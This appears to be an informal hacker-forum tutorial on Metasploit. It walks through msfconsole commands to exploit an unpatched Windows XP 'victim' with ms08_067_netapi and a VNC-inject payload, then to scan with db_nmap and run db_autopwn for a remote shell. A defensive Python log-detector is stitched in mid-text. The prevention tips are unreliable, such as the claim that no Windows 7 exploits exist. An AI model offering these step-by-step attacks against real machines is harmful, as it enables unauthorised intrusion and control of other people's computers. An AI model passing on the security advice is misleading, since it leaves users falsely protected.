NOTE: I'm not responsible for anything you do with this info!
I won't go too deep, so this paper doesn't get boring :)
Okay so let's begin!
First of all, you're probably wondering: what is Metasploit?
Metasploit is a framework which lets us pentest a remote machine to see if it's vulnerable to any exploit, and if it is, we can control that remote machine from our own computer.
How does it work?
Metasploit works on 3 things -
1. Vulnerability
2. Exploits
3. Payloads
Okay, let me give you a real life example.
Just imagine there's a house which is locked, and a thief comes along; if he tries 7-8 combinations of keys he is able to crack that lock and get into the house.
=>> This is what Metasploit calls a vulnerability.
Now the thief tries some combinations of keys and gets into the house successfully.
=>> This is what Metasploit calls an exploit.
Now it depends on the thief what he wants to do with the house: he can steal jewellery, money or any other item in the house. Basically, the things he does after getting into the house.
=>> This is what Metasploit calls a payload.
Okay, now let me explain this in a hacker's language.
Just imagine you have found a vulnerable computer running XP SP2 as its operating system, and there's already an exploit available for XP SP2.
=>> This is the vulnerability.
Now you run the exploit by providing the victim's IP address and an open port.
=>> This is the exploit.
Now you need to send a payload to his computer. There are many payloads available in Metasploit: you can get a shell on the victim's PC, capture his keystrokes, control his PC through remote desktop, upload and execute a .EXE file, and many other things.
=>> This is the payload.
Now the question is: how to use Metasploit?
Hmm, Metasploit is available in two forms - console (cmd) and GUI (graphical user interface).
Console is the best, so we'll go with it.
Metasploit has different commands for different things.
If you want to see the exploits, simply type = show exploits
If you want to see the payloads, type = show payloads
After setting all the options, type = exploit
Okay, so now the basics of how Metasploit works are clear. Now let's move on to a higher level, which is hacking ;)
Suppose you have a victim who is running an unpatched XP SP2, and you have his IP.
Now you need to open msfconsole.
Wait, let it load; it'll take some time as it has more than 600 exploits and 200 payloads.
Now when it is loaded, type = db_driver sqlite3
=>> It'll load the database driver.
Now type = db_create
=>> It'll create a new database.
Type = show exploits
=>> It'll list all exploits currently present in the Metasploit database.
Now type = use [exploit name] (we'll use the windows/smb/ms08_067_netapi exploit, as we are attacking an XP SP2 machine)
So type = use windows/smb/ms08_067_netapi
=>> It'll load the exploit. Usually exploits target a security hole in third-party software, but this one targets a hole in a Windows XP system file.
Now you need to select a payload, type = show payloads
=>> It'll show you all payloads currently in the database. We'll use the vncinject payload (the payload command is = set PAYLOAD [payload name]).
So type = set PAYLOAD windows/vncinject/bind_tcp
Now type = show options
=>> It'll list all the options that you need to fill in now.
To fill in an option the command is = set [option name] [your value]
You need to fill in some options like RHOST, RPORT, LPORT, LHOST, etc. Fill them in as follows.
RHOST (remote host) = Remote machine's IP (victim's IP)
To see the victim's open ports, use Nmap to scan his IP. Now fill in all the options.
And at last type = exploit
=>> Bangggg! You are done! A new window should open; it's like you are sitting at the PC, you can control the whole PC :)
In this paper I'll explain:
1. How exploits work.
2. How to prevent your computer from being exploited.
3. How to use the autopwn function in Metasploit to hack a remote machine.
How do exploits work?
Exploits are made by finding a security hole in a piece of software. Through that hole we can then send our payload to perform different actions.
Exploit writers need very deep knowledge of the software/program in which they are trying to find a security hole in order to write an exploit. Usually exploits target third-party software, as that is where most security holes are found. But there are also some exploits that attack the OS directly, meaning the security hole is in a Windows file itself.
How to prevent your computer from being exploited.
Almost 60% of operating systems are patched to date, and there's no exploit for Win 7 currently. Some anti-viruses can also block some hackers from exploiting your computer.
Still, there are some things you can do to prevent your computer from being exploited:
1. Never open any unwanted link.
2. Never turn your AV off, even when someone tells you to do so.
3. Don't share your IP with anyone.
4. If you know a hacker has your IP address and you have a dynamic IP, simply reconnect your internet connection.
These are some steps you can follow to prevent your computer from being exploited.
_________________________________
Now I'll explain how to hack a remote computer just by its IP address, by launching an exploit against third-party software on the victim's computer.
It works 50% of the time.
Download the latest Metasploit framework from its official site - www.metasploit.com
Okay, now that you've downloaded it, install it; during installation it'll ask if you want to install Nmap as well, say YES.
Nmap is a tool which lets you check the open ports, OS, services, etc. of a remote computer just from its IP.
Now launch msfconsole.
It'll take some time as it has more than 600 exploits and 200 payloads.
Type = db_driver sqlite3
=>> It'll enable the database driver.
Now type = db_create
=>> It'll create a database.
Type = nmap
=>> It'll load Nmap.
Now type = db_nmap -sT -sV [victim's ip address]
=>> It'll show the open ports of the victim's machine.
Now finally type = db_autopwn -p -t -e
=>> Now it'll automatically try different exploits on the remote machine, and if it finds one that works, it'll give you a CMD shell on the remote PC!
Voila! Now you can do anything with his PC!
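Both walkthroughs above (the ms08_067_netapi session and the db_nmap/db_autopwn session) look the same from the target's side: one source address touches many ports within a few seconds (the nmap -sT -sV sweep), then opens fresh SMB connections on 139/445 (the transport the ms08_067_netapi exploit uses), and afterwards a port the scan never saw starts accepting connections (a bind_tcp payload listening on LPORT). The following script is an added example, not code from this paper or from the Metasploit project, that spots that sequence in firewall logs. The log format, the thresholds, the addresses and the timestamps are all constructed for the example.

```python
"""Flag the scan-then-SMB sequence described in the tutorial, from the defender's side.

Added example: log format, thresholds and sample data are constructed, not taken
from any real product.  Each log line is
    <ISO timestamp> <src ip> <dst ip> <dst port> <ACCEPT|DROP>
"""
from collections import defaultdict
from datetime import datetime, timedelta

SMB_PORTS = {139, 445}              # ms08_067_netapi travels over SMB
SCAN_PORT_THRESHOLD = 8             # distinct ports from one source counts as a scan
SCAN_WINDOW = timedelta(seconds=60)  # the ports must be touched inside this window

# Constructed sample log (RFC 5737 documentation addresses, invented times):
# 192.0.2.10 sweeps ten ports, returns to 445 twice, then a new port 4444 is
# accepted.  192.0.2.20 is ordinary web traffic and must not raise an alert.
SAMPLE_LOG = """\
2009-05-01T10:00:01 192.0.2.10 198.51.100.5 21 ACCEPT
2009-05-01T10:00:01 192.0.2.10 198.51.100.5 22 DROP
2009-05-01T10:00:02 192.0.2.10 198.51.100.5 23 DROP
2009-05-01T10:00:02 192.0.2.10 198.51.100.5 25 DROP
2009-05-01T10:00:03 192.0.2.10 198.51.100.5 80 ACCEPT
2009-05-01T10:00:03 192.0.2.10 198.51.100.5 110 DROP
2009-05-01T10:00:04 192.0.2.10 198.51.100.5 135 ACCEPT
2009-05-01T10:00:04 192.0.2.10 198.51.100.5 139 ACCEPT
2009-05-01T10:00:05 192.0.2.10 198.51.100.5 445 ACCEPT
2009-05-01T10:00:05 192.0.2.10 198.51.100.5 3389 DROP
2009-05-01T10:01:30 192.0.2.10 198.51.100.5 445 ACCEPT
2009-05-01T10:01:31 192.0.2.10 198.51.100.5 445 ACCEPT
2009-05-01T10:01:40 192.0.2.10 198.51.100.5 4444 ACCEPT
2009-05-01T10:02:00 192.0.2.20 198.51.100.5 80 ACCEPT
2009-05-01T10:02:05 192.0.2.20 198.51.100.5 443 ACCEPT
"""


def parse_line(line):
    """Split one constructed log line into a dict with typed fields."""
    ts, src, dst, port, action = line.split()
    return {"ts": datetime.fromisoformat(ts), "src": src, "dst": dst,
            "port": int(port), "action": action}


def parse_log(text):
    return [parse_line(line) for line in text.splitlines() if line.strip()]


def find_scan_burst(events):
    """Return the first run of events (one src->dst pair, sorted by time) that
    touches SCAN_PORT_THRESHOLD distinct ports inside SCAN_WINDOW, else None."""
    for i, first in enumerate(events):
        burst = []
        for ev in events[i:]:
            if ev["ts"] - first["ts"] > SCAN_WINDOW:
                break
            burst.append(ev)
        if len({e["port"] for e in burst}) >= SCAN_PORT_THRESHOLD:
            return burst
    return None


def detect(events):
    """Group traffic by (src, dst); alert when a scan is followed by SMB traffic
    or by an accepted connection to a port the scan never touched."""
    by_pair = defaultdict(list)
    for ev in events:
        by_pair[(ev["src"], ev["dst"])].append(ev)

    alerts = []
    for (src, dst), evs in by_pair.items():
        evs.sort(key=lambda e: e["ts"])
        burst = find_scan_burst(evs)
        if burst is None:
            continue
        scan_end = burst[-1]["ts"]
        scanned_ports = {e["port"] for e in burst}
        after = [e for e in evs if e["ts"] > scan_end and e["action"] == "ACCEPT"]
        smb_follow = [e for e in after if e["port"] in SMB_PORTS]
        # An accepted port the scan never saw means a listener appeared later:
        # consistent with a bind_tcp payload opened on LPORT after exploitation.
        new_ports = sorted({e["port"] for e in after if e["port"] not in scanned_ports})
        alerts.append({
            "src": src, "dst": dst,
            "scanned_ports": len(scanned_ports),
            "smb_connections_after_scan": len(smb_follow),
            "new_ports_after_scan": new_ports,
            "severity": "high" if smb_follow else "medium",
        })
    return alerts


def run_sample():
    """Run the detector over the constructed log; returns one alert for 192.0.2.10."""
    return detect(parse_log(SAMPLE_LOG))


if __name__ == "__main__":
    for alert in run_sample():
        print(alert)
```

The thresholds are deliberately loose so the logic stays readable; on a real network the scan window and port count would be tuned against normal traffic, and the "new port accepted after a scan" signal is the one worth alerting on by itself, since a patched host never opens a fresh listener in response to a sweep.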
x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-
Now the white papers are over for Metasploit, now only tutorials will come >:D<
Again - I'm not responsible for anything you do with this info!
If you have any questions, I'll try my best to help you!